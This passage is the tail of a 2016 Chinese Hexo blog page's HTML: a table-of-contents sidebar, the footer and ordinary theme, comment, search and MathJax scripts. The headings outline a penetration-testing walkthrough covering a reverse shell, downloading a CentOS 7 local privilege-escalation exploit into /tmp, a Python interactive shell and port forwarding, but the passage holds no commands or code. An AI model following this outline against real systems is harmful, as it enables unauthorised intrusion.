nav-level-5"><a class="nav-link" href="#netsh-windows自带"><span class="nav-number">1.5.2.3.4.</span> <span class="nav-text">netsh (windows自带)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#reGeorgSocksProxy-py"><span class="nav-number">1.5.2.3.5.</span> <span class="nav-text">reGeorgSocksProxy.py</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#meterpreter-porfwd-（）"><span class="nav-number">1.5.2.3.6.</span> <span class="nav-text">meterpreter porfwd （）</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-演示"><span class="nav-number">1.6.</span> <span class="nav-text">0x04 演示</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#获取发行版本-1"><span class="nav-number">1.6.1.</span> <span class="nav-text">获取发行版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#反弹shell-1"><span class="nav-number">1.6.2.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看权限是低权限"><span class="nav-number">1.6.3.</span> <span class="nav-text">查看权限是低权限</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#在www-exploit-db-com-搜索exp，"><span class="nav-number">1.6.4.</span> <span class="nav-text">在www.exploit-db.com 搜索exp，</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#找到centos7版本的，点开看看，发现是国人写的2333"><span class="nav-number">1.6.5.</span> <span class="nav-text">找到centos7版本的，点开看看，发现是国人写的2333~</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#直接curl-下载地址"><span class="nav-number">1.6.6.</span> <span class="nav-text">直接curl 下载地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ls-查看发现没下载，说明权限不够，"><span class="nav-number">1.6.7.</span> <span class="nav-text">ls 查看发现没下载，说明权限不够，</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cd-到权限777的tmp目录"><span class="nav-number">1.6.8.</span> <span class="nav-text">cd 到权限777的tmp目录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#成功"><span class="nav-number">1.6.9.</span> <span class="nav-text">成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看权限-并用python创建交互性的bash"><span class="nav-number">1.6.10.</span> <span class="nav-text">查看权限 并用python创建交互性的bash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#尝试ssh连接，免密码登录"><span class="nav-number">1.6.11.</span> <span class="nav-text">尝试ssh连接，免密码登录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#尝试端口转发"><span class="nav-number">1.6.12.</span> <span class="nav-text">尝试端口转发</span></a></li></ol></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">shawnleon</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

<div class="busuanzi-count">

  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv"><i class="fa fa-user"></i><span class="busuanzi-value" id="busuanzi_value_site_uv"></span></span>
  

  
    <span class="site-pv"><i class="fa fa-eye"></i><span class="busuanzi-value" id="busuanzi_value_site_pv"></span></span>
  
  
</div>



        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"shawnleon"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = true;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = data.url;
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '' && data_content != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title < 0 && index_content < 0 ){
                                isMatch = false;
                            } else {
                                if (index_content < 0) {
                                    index_content = 0;
                                }
                                if (i == 0) {
                                    first_occur = index_content;
                                }
                            }
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });

                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
  </script>

  <script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  </script>
  <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


  

  

</body>
</html>
